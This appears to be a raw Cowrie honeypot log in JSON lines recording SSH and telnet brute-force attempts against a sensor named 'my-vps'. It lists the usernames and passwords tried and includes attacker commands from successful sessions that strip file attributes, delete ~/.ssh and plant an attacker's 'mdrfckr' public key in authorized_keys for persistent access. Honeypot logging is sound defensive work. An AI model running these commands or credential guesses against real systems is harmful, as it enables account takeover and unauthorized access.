{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"57:65:00:37:e8:a9:fd:9f:75:7a:f5:2c:77:c3:4d:41","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFO/EFQQxBqSY+X93ECTUYQLxAzf5s0pnaOu4RZPmSGn17b7Kixa8j2BKOu/mL1nvfBuuYohdihdT7RVaEJDPg7lKbsGUDhaH6ifEH0ADYTjx81jzOaPC0gyiYuVZKqt2nAHAP0a7oiJq0g6HZ4f3fMD1a369pQofomOjTq3cbXvLOSiuEq1pDfRmNSMM0m6BDiRhpqR9kSF2t0zY4hpmN+v1AamfNRtJ1LDXoSGJW8kl5/LAnoJEDHaycNtAPUsMpAgpxfY/nMOjTvlZEHbA7SlnC36Cpw9RELDK5zipMUNuptUpZHEfO7j8OrhW98C5BGoTjk8L5UXQ/lPahsXyd+/4ztpO4yVjLR40leD5SvsM8HSOEC8t70VL3FCdoT5tcU9Td5XY+WpJ98EE1tBpdvyKV69co39DEqQPdT0j073SUtc5rduy6JQnvs+E3VhI6ZVoT0TydJkhfjNOykBLo+2UBEHCIKr1YTRewYsgtjCl3r3oWdZ06YuLrrYt7Ih4N/WHIjVgfzzryvs0xhglWxpfQRl/upz1PUEedGm/j8g+osJyl+4XR+neJWITg1jfnjzHuCyaUarOTwysJ9KjSdxYG1YrsZr+OzGoSF2YtusJd+Dl9mLQ7Io4jsrUslUre67Ym0Dj9PDRDhmCED6HR7BimwA9QtMg/MZlH4BelUQ==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T04:58:14.328192Z","src_ip":"212.227.235.229","session":"575e4891f923"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"57:65:00:37:e8:a9:fd:9f:75:7a:f5:2c:77:c3:4d:41","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFO/EFQQxBqSY+X93ECTUYQLxAzf5s0pnaOu4RZPmSGn17b7Kixa8j2BKOu/mL1nvfBuuYohdihdT7RVaEJDPg7lKbsGUDhaH6ifEH0ADYTjx81jzOaPC0gyiYuVZKqt2nAHAP0a7oiJq0g6HZ4f3fMD1a369pQofomOjTq3cbXvLOSiuEq1pDfRmNSMM0m6BDiRhpqR9kSF2t0zY4hpmN+v1AamfNRtJ1LDXoSGJW8kl5/LAnoJEDHaycNtAPUsMpAgpxfY/nMOjTvlZEHbA7SlnC36Cpw9RELDK5zipMUNuptUpZHEfO7j8OrhW98C5BGoTjk8L5UXQ/lPahsXyd+/4ztpO4yVjLR40leD5SvsM8HSOEC8t70VL3FCdoT5tcU9Td5XY+WpJ98EE1tBpdvyKV69co39DEqQPdT0j073SUtc5rduy6JQnvs+E3VhI6ZVoT0TydJkhfjNOykBLo+2UBEHCIKr1YTRewYsgtjCl3r3oWdZ06YuLrrYt7Ih4N/WHIjVgfzzryvs0xhglWxpfQRl/upz1PUEedGm/j8g+osJyl+4XR+neJWITg1jfnjzHuCyaUarOTwysJ9KjSdxYG1YrsZr+OzGoSF2YtusJd+Dl9mLQ7Io4jsrUslUre67Ym0Dj9PDRDhmCED6HR7BimwA9QtMg/MZlH4BelUQ==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 57:65:00:37:e8:a9:fd:9f:75:7a:f5:2c:77:c3:4d:41","sensor":"my-vps","timestamp":"2025-09-09T04:58:14.428970Z","src_ip":"212.227.235.229","session":"575e4891f923"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"57:65:00:37:e8:a9:fd:9f:75:7a:f5:2c:77:c3:4d:41","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFO/EFQQxBqSY+X93ECTUYQLxAzf5s0pnaOu4RZPmSGn17b7Kixa8j2BKOu/mL1nvfBuuYohdihdT7RVaEJDPg7lKbsGUDhaH6ifEH0ADYTjx81jzOaPC0gyiYuVZKqt2nAHAP0a7oiJq0g6HZ4f3fMD1a369pQofomOjTq3cbXvLOSiuEq1pDfRmNSMM0m6BDiRhpqR9kSF2t0zY4hpmN+v1AamfNRtJ1LDXoSGJW8kl5/LAnoJEDHaycNtAPUsMpAgpxfY/nMOjTvlZEHbA7SlnC36Cpw9RELDK5zipMUNuptUpZHEfO7j8OrhW98C5BGoTjk8L5UXQ/lPahsXyd+/4ztpO4yVjLR40leD5SvsM8HSOEC8t70VL3FCdoT5tcU9Td5XY+WpJ98EE1tBpdvyKV69co39DEqQPdT0j073SUtc5rduy6JQnvs+E3VhI6ZVoT0TydJkhfjNOykBLo+2UBEHCIKr1YTRewYsgtjCl3r3oWdZ06YuLrrYt7Ih4N/WHIjVgfzzryvs0xhglWxpfQRl/upz1PUEedGm/j8g+osJyl+4XR+neJWITg1jfnjzHuCyaUarOTwysJ9KjSdxYG1YrsZr+OzGoSF2YtusJd+Dl9mLQ7Io4jsrUslUre67Ym0Dj9PDRDhmCED6HR7BimwA9QtMg/MZlH4BelUQ==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T04:58:14.429659Z","src_ip":"212.227.235.229","session":"575e4891f923"}
{"eventid":"cowrie.session.closed","duration":12.797945737838745,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:15.089434Z","src_ip":"122.97.209.175","session":"03172d785404"}
{"eventid":"cowrie.session.connect","src_ip":"122.194.9.203","src_port":64392,"dst_ip":"1.2.3.4","dst_port":23,"session":"68b275628755","protocol":"telnet","message":"New connection: 122.194.9.203:64392 (1.2.3.4:23) [session: 68b275628755]","sensor":"my-vps","timestamp":"2025-09-09T04:58:15.362589Z"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":55246,"dst_ip":"1.2.3.4","dst_port":22,"session":"d32020a6d0b5","protocol":"ssh","message":"New connection: 92.118.39.62:55246 (1.2.3.4:22) [session: d32020a6d0b5]","sensor":"my-vps","timestamp":"2025-09-09T04:58:18.410745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:58:18.411705Z","src_ip":"92.118.39.62","session":"d32020a6d0b5"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T04:58:18.441210Z","src_ip":"92.118.39.62","session":"d32020a6d0b5"}
{"eventid":"cowrie.login.failed","username":"airflow","password":"airflow123","message":"login attempt [airflow/airflow123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:58:18.560720Z","src_ip":"92.118.39.62","session":"d32020a6d0b5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:19.593668Z","src_ip":"92.118.39.62","session":"d32020a6d0b5"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:24.021578Z","src_ip":"212.227.235.229","session":"575e4891f923"}
{"eventid":"cowrie.session.connect","src_ip":"103.179.57.150","src_port":41594,"dst_ip":"1.2.3.4","dst_port":22,"session":"2aadc138b895","protocol":"ssh","message":"New connection: 103.179.57.150:41594 (1.2.3.4:22) [session: 2aadc138b895]","sensor":"my-vps","timestamp":"2025-09-09T04:58:27.361613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:58:27.362616Z","src_ip":"103.179.57.150","session":"2aadc138b895"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:58:27.637086Z","src_ip":"103.179.57.150","session":"2aadc138b895"}
{"eventid":"cowrie.session.closed","duration":12.734293222427368,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:28.096815Z","src_ip":"122.194.9.203","session":"68b275628755"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":20245,"dst_ip":"1.2.3.4","dst_port":23,"session":"fb5835243d87","protocol":"telnet","message":"New connection: 122.97.209.175:20245 (1.2.3.4:23) [session: fb5835243d87]","sensor":"my-vps","timestamp":"2025-09-09T04:58:28.228512Z"}
{"eventid":"cowrie.login.success","username":"root","password":"P@Ssw0rd@","message":"login attempt [root/P@Ssw0rd@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:58:28.780346Z","src_ip":"103.179.57.150","session":"2aadc138b895"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:58:29.348365Z","src_ip":"103.179.57.150","session":"2aadc138b895"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:58:29.349039Z","src_ip":"103.179.57.150","session":"2aadc138b895"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:58:29.350201Z","src_ip":"103.179.57.150","session":"2aadc138b895"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:29.625799Z","src_ip":"103.179.57.150","session":"2aadc138b895"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:58:30.276154Z","src_ip":"103.179.57.150","session":"2aadc138b895"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:58:30.276835Z","src_ip":"103.179.57.150","session":"2aadc138b895"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:58:30.554142Z","src_ip":"103.179.57.150","session":"2aadc138b895"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:30.555097Z","src_ip":"103.179.57.150","session":"2aadc138b895"}
{"eventid":"cowrie.session.connect","src_ip":"103.179.57.150","src_port":41602,"dst_ip":"1.2.3.4","dst_port":22,"session":"aec4203d6a69","protocol":"ssh","message":"New connection: 103.179.57.150:41602 (1.2.3.4:22) [session: aec4203d6a69]","sensor":"my-vps","timestamp":"2025-09-09T04:58:31.581167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:58:31.587789Z","src_ip":"103.179.57.150","session":"aec4203d6a69"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:58:31.852381Z","src_ip":"103.179.57.150","session":"aec4203d6a69"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:58:32.917700Z","src_ip":"103.179.57.150","session":"aec4203d6a69"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:34.190376Z","src_ip":"103.179.57.150","session":"aec4203d6a69"}
{"eventid":"cowrie.session.connect","src_ip":"103.179.57.150","src_port":41614,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ab6ec045580","protocol":"ssh","message":"New connection: 103.179.57.150:41614 (1.2.3.4:22) [session: 9ab6ec045580]","sensor":"my-vps","timestamp":"2025-09-09T04:58:34.446566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:58:34.447395Z","src_ip":"103.179.57.150","session":"9ab6ec045580"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:58:35.685340Z","src_ip":"103.179.57.150","session":"9ab6ec045580"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:58:36.459139Z","src_ip":"103.179.57.150","session":"9ab6ec045580"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:36.719491Z","src_ip":"103.179.57.150","session":"9ab6ec045580"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:36.723500Z","src_ip":"103.179.57.150","session":"2aadc138b895"}
{"eventid":"cowrie.session.closed","duration":12.853116989135742,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:41.081560Z","src_ip":"122.97.209.175","session":"fb5835243d87"}
{"eventid":"cowrie.session.connect","src_ip":"122.194.9.203","src_port":52519,"dst_ip":"1.2.3.4","dst_port":23,"session":"b699b06c0464","protocol":"telnet","message":"New connection: 122.194.9.203:52519 (1.2.3.4:23) [session: b699b06c0464]","sensor":"my-vps","timestamp":"2025-09-09T04:58:41.245580Z"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":58410,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c694184ff9e","protocol":"ssh","message":"New connection: 102.68.86.62:58410 (1.2.3.4:22) [session: 9c694184ff9e]","sensor":"my-vps","timestamp":"2025-09-09T04:58:45.851802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:58:45.852461Z","src_ip":"102.68.86.62","session":"9c694184ff9e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:58:46.026861Z","src_ip":"102.68.86.62","session":"9c694184ff9e"}
{"eventid":"cowrie.login.failed","username":"db2admin","password":"password1","message":"login attempt [db2admin/password1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:58:46.777507Z","src_ip":"102.68.86.62","session":"9c694184ff9e"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:48.007258Z","src_ip":"102.68.86.62","session":"9c694184ff9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36674,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae56cade4bf8","protocol":"ssh","message":"New connection: 212.227.235.229:36674 (1.2.3.4:22) [session: ae56cade4bf8]","sensor":"my-vps","timestamp":"2025-09-09T04:58:50.521213Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:58:50.522041Z","src_ip":"212.227.235.229","session":"ae56cade4bf8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:58:50.794656Z","src_ip":"212.227.235.229","session":"ae56cade4bf8"}
{"eventid":"cowrie.login.success","username":"root","password":"1@!","message":"login attempt [root/1@!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:58:51.940198Z","src_ip":"212.227.235.229","session":"ae56cade4bf8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:58:52.558865Z","src_ip":"212.227.235.229","session":"ae56cade4bf8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:58:52.559558Z","src_ip":"212.227.235.229","session":"ae56cade4bf8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:58:52.560342Z","src_ip":"212.227.235.229","session":"ae56cade4bf8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:52.835355Z","src_ip":"212.227.235.229","session":"ae56cade4bf8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:58:53.980237Z","src_ip":"212.227.235.229","session":"ae56cade4bf8"}
